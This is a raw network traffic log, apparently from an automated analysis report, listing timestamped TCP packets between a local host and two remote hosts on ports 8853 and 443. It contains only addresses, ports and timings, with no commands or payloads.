                                                                                  Jan 8, 2025 07:15:04.396929979 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.397078037 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.530256033 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530275106 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530287981 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530301094 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530313015 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530313969 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.530324936 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530347109 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530352116 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.530359030 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530369997 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530374050 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.530381918 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530396938 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530397892 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.530417919 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.530498028 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530508995 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530520916 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530543089 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.530569077 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.530985117 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.530996084 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531008005 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531070948 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.531102896 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531117916 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531128883 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531141043 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531160116 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.531183958 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.531347990 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531359911 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531373024 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531383038 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531393051 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.531404972 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.531819105 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531832933 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531847000 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.531863928 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.531893015 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.531934977 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.536746979 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.697570086 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.697663069 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:04.698662043 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.698709965 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:04.870995045 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:04.871018887 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.871411085 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.871476889 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:04.877402067 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:04.919342995 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.222997904 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.223021984 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.223038912 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.223088026 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:05.223133087 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:05.223143101 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.223193884 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:05.309952021 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.309972048 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.310040951 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:05.310056925 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.310101032 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:05.311079025 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.311094999 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.311160088 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:05.311167002 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.315021038 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:05.390753031 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.390773058 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:05.390860081 CET49732443192.168.2.447.79.48.230
Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Jan 8, 2025 07:15:05.390870094 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.391110897 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.396420002 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.396435022 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.396513939 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.396524906 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.397202969 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.397367954 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.397382975 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.397452116 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.397459984 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.398287058 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.398307085 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.398355961 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.398370028 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.398380041 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.398412943 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.477685928 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.477704048 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.477781057 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.477793932 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.478415012 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.478441000 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.478477001 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.478483915 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.478514910 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.478542089 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.483546972 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.483563900 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.483633041 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.483640909 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.483675957 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.483695030 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.487740993 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.487757921 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.487824917 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.487833023 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.491121054 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.498301029 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.498320103 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.498398066 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.498405933 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.499175072 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.510607958 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.510622978 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.510723114 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.510730982 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.510773897 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.522897959 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.522918940 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.522984982 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.522993088 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.523044109 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.564538956 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.564605951 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.564608097 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.564620972 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.564662933 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.565454006 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.565469027 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.565520048 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.565529108 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.565556049 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.565565109 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.566328049 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.566342115 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.566390991 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.566397905 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.566436052 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.570300102 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.570316076 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.570346117 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.570383072 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.570386887 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.570444107 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.580671072 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.580688000 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.580771923 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.580781937 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.580790043 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.580817938 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.590991974 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.591011047 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.591078997 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.591089010 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.591248035 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.697685003 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.697709084 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.697768927 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.697794914 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.697809935 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.697837114 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.707380056 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.707408905 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.707438946 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.707448006 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.707480907 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.707495928 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.718741894 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.718765020 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.718857050 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.718866110 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.718913078 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.728418112 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.728437901 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.728481054 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.728490114 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.728514910 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.728537083 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.739830971 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.739854097 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.739885092 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.739891052 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.739917040 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.739929914 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.751162052 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.751182079 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.751223087 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.751230955 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.751255035 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.751281977 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.760618925 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.760637999 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.760674000 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.760682106 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.760715961 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.760734081 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.772023916 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.772043943 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.772110939 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.772120953 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.772228003 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.784470081 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.784491062 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.784529924 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.784537077 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.784562111 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.784579992 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.792330027 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.792354107 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.792392015 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.792398930 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.792426109 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.792440891 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.803890944 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.803919077 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.803971052 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.803977966 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.804008961 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.804023027 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.813785076 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.813805103 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.813843966 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.813853025 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.813882113 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.813906908 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.823071957 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.823095083 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.823131084 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.823137999 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.823158026 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.823179960 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.836222887 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.836242914 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.836323977 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.836330891 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.836390972 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.847534895 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.847559929 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.847596884 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.847604990 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.847629070 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.847650051 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.882544994 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.882564068 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.882626057 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.882646084 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.882967949 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.933643103 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.933662891 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.933737040 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.933763981 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.933852911 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.945311069 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.945334911 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.945389986 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.945398092 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.945450068 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.954847097 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.954864979 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.954926968 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.954936028 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.954967022 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.954977989 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.978590965 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.978606939 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.978661060 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.978671074 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.978698969 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.978712082 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.979212999 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.979228020 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.979269028 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.979274988 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.979304075 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.979330063 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.990267992 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.990283966 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.990334034 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.990349054 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.990386009 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.990386009 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.998552084 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.998567104 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.998615026 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.998631954 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:05.998642921 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:05.998670101 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.007986069 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.008002043 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.008058071 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.008064985 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.008093119 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.008109093 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.020632029 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.020647049 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.020701885 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.020710945 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.020720005 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.020754099 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.032130957 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.032146931 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.032201052 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.032207966 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.032252073 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.041790009 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.041806936 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.041867971 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.041877031 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.041994095 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.051238060 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.051254034 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.051318884 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.051328897 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.051460981 CET  49732        443        192.168.2.4   47.79.48.230
                                                                                  Jan 8, 2025 07:15:06.062717915 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.062736988 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.062841892 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.062850952 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.062906027 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.072269917 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.072305918 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.072338104 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.072346926 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.072393894 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.083684921 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.083703041 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.083766937 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.083776951 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.083941936 CET49732443192.168.2.447.79.48.230
